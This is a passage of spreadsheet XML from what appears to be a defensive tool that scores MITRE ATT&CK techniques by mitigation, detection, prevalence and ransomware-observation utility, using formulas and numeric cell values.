        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M404" s="37">
        <v>0</v>
      </c>
      <c r="N404" s="56">
        <v>0</v>
      </c>
      <c r="O404" s="56">
        <v>3</v>
      </c>
      <c r="P404" s="56">
        <v>2</v>
      </c>
      <c r="Q404" s="56">
        <v>2</v>
      </c>
      <c r="R404" s="57"/>
      <c r="S404" s="57">
        <v>0</v>
      </c>
      <c r="T404" s="57" t="s">
        <v>1424</v>
      </c>
      <c r="U404" s="57">
        <v>0</v>
      </c>
      <c r="V404" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>3.3333333333333333E-2</v>
      </c>
      <c r="W404" s="37">
        <v>0</v>
      </c>
      <c r="X404" s="37">
        <v>0</v>
      </c>
      <c r="Y404" s="37">
        <v>0</v>
      </c>
      <c r="Z404" s="37">
        <v>7</v>
      </c>
      <c r="AA404" s="37">
        <v>7.0000000000000007E-2</v>
      </c>
      <c r="AB404" s="37">
        <v>7.0000000000000007E-2</v>
      </c>
      <c r="AC404" s="37"/>
      <c r="AD404" s="50" t="s">
        <v>1220</v>
      </c>
      <c r="AE404" s="37" t="str" cm="1">
        <f t="array" ref="AE404">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD404)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF404" s="37">
        <v>400</v>
      </c>
      <c r="AG404" s="37" t="str" cm="1">
        <f t="array" ref="AG404">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD404)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH404" s="37">
        <v>400</v>
      </c>
      <c r="AI404" s="37" t="str" cm="1">
        <f t="array" ref="AI404">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD404)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ404" s="37">
        <v>400</v>
      </c>
      <c r="AK404" s="37" t="str" cm="1">
        <f t="array" ref="AK404">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD404)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL404" s="37">
        <v>400</v>
      </c>
      <c r="AM404" s="37" t="str" cm="1">
        <f t="array" ref="AM404">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD404)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN404" s="37">
        <v>0</v>
      </c>
      <c r="AO404" s="37"/>
      <c r="AP404" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ404" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>71.155555555555551</v>
      </c>
      <c r="AR404" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS404" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT404" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU40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05" spans="1:47" ht="34">
      <c r="A405" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B405" s="37">
        <f t="shared" si="6"/>
        <v>458.57142857142856</v>
      </c>
      <c r="C405" s="37" t="s">
        <v>1425</v>
      </c>
      <c r="D405" s="50" t="s">
        <v>1426</v>
      </c>
      <c r="E405" s="37"/>
      <c r="F405" s="37">
        <v>1</v>
      </c>
      <c r="G405" s="37">
        <v>1</v>
      </c>
      <c r="H405" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I405" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J405" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K405" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L405" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M405" s="37">
        <v>0</v>
      </c>
      <c r="N405" s="56">
        <v>0</v>
      </c>
      <c r="O405" s="56">
        <v>4</v>
      </c>
      <c r="P405" s="56">
        <v>9</v>
      </c>
      <c r="Q405" s="56">
        <v>4</v>
      </c>
      <c r="R405" s="57" t="s">
        <v>254</v>
      </c>
      <c r="S405" s="57">
        <v>2</v>
      </c>
      <c r="T405" s="57" t="s">
        <v>1427</v>
      </c>
      <c r="U405" s="57">
        <v>9</v>
      </c>
      <c r="V405" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.18571428571428572</v>
      </c>
      <c r="W405" s="37">
        <v>11</v>
      </c>
      <c r="X405" s="37">
        <v>0.2</v>
      </c>
      <c r="Y405" s="37">
        <v>0.2</v>
      </c>
      <c r="Z405" s="37">
        <v>17</v>
      </c>
      <c r="AA405" s="37">
        <v>0.17</v>
      </c>
      <c r="AB405" s="37">
        <v>0.17</v>
      </c>
      <c r="AC405" s="37"/>
      <c r="AD405" s="50" t="s">
        <v>1428</v>
      </c>
      <c r="AE405" s="37" t="str" cm="1">
        <f t="array" ref="AE405">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD405)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF405" s="37">
        <v>401</v>
      </c>
      <c r="AG405" s="37" t="str" cm="1">
        <f t="array" ref="AG405">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD405)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH405" s="37">
        <v>401</v>
      </c>
      <c r="AI405" s="37" t="str" cm="1">
        <f t="array" ref="AI405">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD405)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ405" s="37">
        <v>401</v>
      </c>
      <c r="AK405" s="37" t="str" cm="1">
        <f t="array" ref="AK405">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD405)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL405" s="37">
        <v>401</v>
      </c>
      <c r="AM405" s="37" t="str" cm="1">
        <f t="array" ref="AM405">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD405)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN405" s="37">
        <v>0</v>
      </c>
      <c r="AO405" s="37">
        <v>0</v>
      </c>
      <c r="AP405" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ405" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>152.85714285714286</v>
      </c>
      <c r="AR405" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS405" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT405" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU40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06" spans="1:47" ht="51">
      <c r="A406" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B406" s="37">
        <f t="shared" si="6"/>
        <v>824.42041604761903</v>
      </c>
      <c r="C406" s="37" t="s">
        <v>1429</v>
      </c>
      <c r="D406" s="50" t="s">
        <v>1430</v>
      </c>
      <c r="E406" s="37"/>
      <c r="F406" s="37">
        <v>4</v>
      </c>
      <c r="G406" s="37">
        <v>1</v>
      </c>
      <c r="H406" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.25</v>
      </c>
      <c r="I406" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.4</v>
      </c>
      <c r="J406" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.4</v>
      </c>
      <c r="K406" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L406" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M406" s="37">
        <v>0.20047599999999999</v>
      </c>
      <c r="N406" s="56">
        <v>0</v>
      </c>
      <c r="O406" s="56">
        <v>1</v>
      </c>
      <c r="P406" s="56">
        <v>4</v>
      </c>
      <c r="Q406" s="56">
        <v>0</v>
      </c>
      <c r="R406" s="57">
        <v>5.2</v>
      </c>
      <c r="S406" s="57">
        <v>1</v>
      </c>
      <c r="T406" s="57" t="s">
        <v>1431</v>
      </c>
      <c r="U406" s="57">
        <v>3</v>
      </c>
      <c r="V406" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>6.1904619047619049E-2</v>
      </c>
      <c r="W406" s="37">
        <v>4</v>
      </c>
      <c r="X406" s="37">
        <v>7.2727E-2</v>
      </c>
      <c r="Y406" s="37">
        <v>7.2727E-2</v>
      </c>
      <c r="Z406" s="37">
        <v>5</v>
      </c>
      <c r="AA406" s="37">
        <v>0.05</v>
      </c>
      <c r="AB406" s="37">
        <v>0.05</v>
      </c>
      <c r="AC406" s="37"/>
      <c r="AD406" s="50" t="s">
        <v>1432</v>
      </c>
      <c r="AE406" s="37" t="str" cm="1">
        <f t="array" ref="AE406">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD406)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF406" s="37">
        <v>402</v>
      </c>
      <c r="AG406" s="37" t="str" cm="1">
        <f t="array" ref="AG406">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD406)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH406" s="37">
        <v>402</v>
      </c>
      <c r="AI406" s="37" t="str" cm="1">
        <f t="array" ref="AI406">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD406)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ406" s="37">
        <v>402</v>
      </c>
      <c r="AK406" s="37" t="str" cm="1">
        <f t="array" ref="AK406">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD406)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL406" s="37">
        <v>402</v>
      </c>
      <c r="AM406" s="37" t="str" cm="1">
        <f t="array" ref="AM406">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD406)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN406" s="37">
        <v>0</v>
      </c>
      <c r="AO406" s="37">
        <v>0</v>
      </c>
      <c r="AP406" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ406" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>274.80680534920634</v>
      </c>
      <c r="AR406" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS406" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT406" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU40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07" spans="1:47" ht="34">
      <c r="A407" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B407" s="37">
        <f t="shared" si="6"/>
        <v>222.74738861904763</v>
      </c>
      <c r="C407" s="37" t="s">
        <v>1433</v>
      </c>
      <c r="D407" s="50" t="s">
        <v>1430</v>
      </c>
      <c r="E407" s="37" t="s">
        <v>1434</v>
      </c>
      <c r="F407" s="37">
        <v>1</v>
      </c>
      <c r="G407" s="37">
        <v>1</v>
      </c>
      <c r="H407" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I407" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J407" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K407" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L407" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M407" s="37">
        <v>0</v>
      </c>
      <c r="N407" s="56">
        <v>0</v>
      </c>
      <c r="O407" s="56">
        <v>0</v>
      </c>
      <c r="P407" s="56">
        <v>0</v>
      </c>
      <c r="Q407" s="56">
        <v>0</v>
      </c>
      <c r="R407" s="57">
        <v>5.2</v>
      </c>
      <c r="S407" s="57">
        <v>1</v>
      </c>
      <c r="T407" s="57" t="s">
        <v>1431</v>
      </c>
      <c r="U407" s="57">
        <v>3</v>
      </c>
      <c r="V407" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>3.809509523809524E-2</v>
      </c>
      <c r="W407" s="37">
        <v>4</v>
      </c>
      <c r="X407" s="37">
        <v>7.2727E-2</v>
      </c>
      <c r="Y407" s="37">
        <v>7.2727E-2</v>
      </c>
      <c r="Z407" s="37">
        <v>0</v>
      </c>
      <c r="AA407" s="37">
        <v>0</v>
      </c>
      <c r="AB407" s="37">
        <v>0</v>
      </c>
      <c r="AC407" s="37"/>
      <c r="AD407" s="50" t="s">
        <v>1435</v>
      </c>
      <c r="AE407" s="37" t="str" cm="1">
        <f t="array" ref="AE407">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD407)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF407" s="37">
        <v>403</v>
      </c>
      <c r="AG407" s="37" t="str" cm="1">
        <f t="array" ref="AG407">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD407)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH407" s="37">
        <v>403</v>
      </c>
      <c r="AI407" s="37" t="str" cm="1">
        <f t="array" ref="AI407">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD407)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ407" s="37">
        <v>403</v>
      </c>
      <c r="AK407" s="37" t="str" cm="1">
        <f t="array" ref="AK407">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD407)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL407" s="37">
        <v>403</v>
      </c>
      <c r="AM407" s="37" t="str" cm="1">
        <f t="array" ref="AM407">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD407)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN407" s="37">
        <v>0</v>
      </c>
      <c r="AO407" s="37">
        <v>0</v>
      </c>
      <c r="AP407" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ407" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>74.249129539682542</v>
      </c>
      <c r="AR407" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS407" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT407" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU40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08" spans="1:47" ht="34">
      <c r="A408" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="B408" s="37">
        <f t="shared" si="6"/>
        <v>261.79961500000002</v>
      </c>
      <c r="C408" s="37" t="s">
        <v>1436</v>
      </c>
      <c r="D408" s="50" t="s">
        <v>1430</v>
      </c>
      <c r="E408" s="37" t="s">
        <v>1437</v>
      </c>
      <c r="F408" s="37">
        <v>1</v>
      </c>
      <c r="G408" s="37">
        <v>1</v>
      </c>
      <c r="H408" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I408" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J408" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K408" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L408" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M408" s="37">
        <v>0</v>
      </c>
      <c r="N408" s="56">
        <v>0</v>
      </c>
      <c r="O408" s="56">
        <v>2</v>
      </c>
      <c r="P408" s="56">
        <v>2</v>
      </c>
      <c r="Q408" s="56">
        <v>3</v>
      </c>
      <c r="R408" s="57"/>
      <c r="S408" s="57">
        <v>0</v>
      </c>
      <c r="T408" s="57" t="s">
        <v>1431</v>
      </c>
      <c r="U408" s="57">
        <v>3</v>
      </c>
      <c r="V408" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>6.1904523809523812E-2</v>
      </c>
      <c r="W408" s="37">
        <v>3</v>
      </c>
      <c r="X408" s="37">
        <v>5.4545000000000003E-2</v>
      </c>
      <c r="Y408" s="37">
        <v>5.4545000000000003E-2</v>
      </c>
      <c r="Z408" s="37">
        <v>7</v>
      </c>
      <c r="AA408" s="37">
        <v>7.0000000000000007E-2</v>
      </c>
      <c r="AB408" s="37">
        <v>7.0000000000000007E-2</v>
      </c>
      <c r="AC408" s="37"/>
      <c r="AD408" s="50" t="s">
        <v>1438</v>
      </c>
      <c r="AE408" s="37" t="str" cm="1">
        <f t="array" ref="AE408">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD408)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF408" s="37">
        <v>404</v>
      </c>
      <c r="AG408" s="37" t="str" cm="1">
        <f t="array" ref="AG408">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD408)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH408" s="37">
        <v>404</v>
      </c>
      <c r="AI408" s="37" t="str" cm="1">
        <f t="array" ref="AI408">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD408)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ408" s="37">
        <v>404</v>
      </c>
      <c r="AK408" s="37" t="str" cm="1">
        <f t="array" ref="AK408">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD408)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL408" s="37">
        <v>404</v>
      </c>
      <c r="AM408" s="37" t="str" cm="1">
        <f t="array" ref="AM408">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD408)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN408" s="37">
        <v>0</v>
      </c>
      <c r="AO408" s="37">
        <v>1</v>
      </c>
      <c r="AP408" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AQ408" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>87.266538333333344</v>
      </c>
      <c r="AR408" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS408" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT408" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU40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2.101584246031746</v>
      </c>
    </row>
    <row r="409" spans="1:47" ht="34">
      <c r="A409" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B409" s="37">
        <f t="shared" si="6"/>
        <v>223.85253533333335</v>
      </c>
      <c r="C409" s="37" t="s">
        <v>1439</v>
      </c>
      <c r="D409" s="50" t="s">
        <v>1430</v>
      </c>
      <c r="E409" s="37" t="s">
        <v>1440</v>
      </c>
      <c r="F409" s="37">
        <v>1</v>
      </c>
      <c r="G409" s="37">
        <v>1</v>
      </c>
      <c r="H409" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I409" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J409" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K409" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L409" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M409" s="37">
        <v>0</v>
      </c>
      <c r="N409" s="56">
        <v>0</v>
      </c>
      <c r="O409" s="56">
        <v>4</v>
      </c>
      <c r="P409" s="56">
        <v>2</v>
      </c>
      <c r="Q409" s="56">
        <v>0</v>
      </c>
      <c r="R409" s="57">
        <v>14.3</v>
      </c>
      <c r="S409" s="57">
        <v>1</v>
      </c>
      <c r="T409" s="57"/>
      <c r="U409" s="57">
        <v>0</v>
      </c>
      <c r="V409" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>3.8095333333333328E-2</v>
      </c>
      <c r="W409" s="37">
        <v>1</v>
      </c>
      <c r="X409" s="37">
        <v>1.8182E-2</v>
      </c>
      <c r="Y409" s="37">
        <v>1.8182E-2</v>
      </c>
      <c r="Z409" s="37">
        <v>6</v>
      </c>
      <c r="AA409" s="37">
        <v>0.06</v>
      </c>
      <c r="AB409" s="37">
        <v>0.06</v>
      </c>
      <c r="AC409" s="37"/>
